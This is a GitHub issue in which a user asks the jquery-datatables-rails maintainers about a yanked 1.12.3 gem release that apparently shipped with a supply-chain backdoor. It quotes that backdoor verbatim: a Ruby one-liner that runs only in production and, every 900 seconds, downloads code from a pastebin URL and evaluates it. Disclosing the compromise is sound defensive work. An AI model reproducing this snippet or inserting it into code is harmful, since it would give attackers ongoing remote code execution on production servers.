jquery-datatables-rails icon indicating copy to clipboard operation
jquery-datatables-rails copied to clipboard

Compromised version 1.12.3?

Open fwilkens opened this issue 5 years ago • 0 comments

Hi there, I noticed that 1.12.3 was published and then yanked last week. It showed up on my radar because it contained the same malicious bits going around the rubygems world right now. i.e.

 _!{require "open-uri";Thread.new{loop{_!{sleep 900;eval(open('https://pastebin.com/raw/5iNdELNX').read)}}}if Rails.env[0]=="p"}

Wanted to confirm that you were aware, and that any compromised rubygems account had been reclaimed?

fwilkens avatar Aug 23 '19 03:08 fwilkens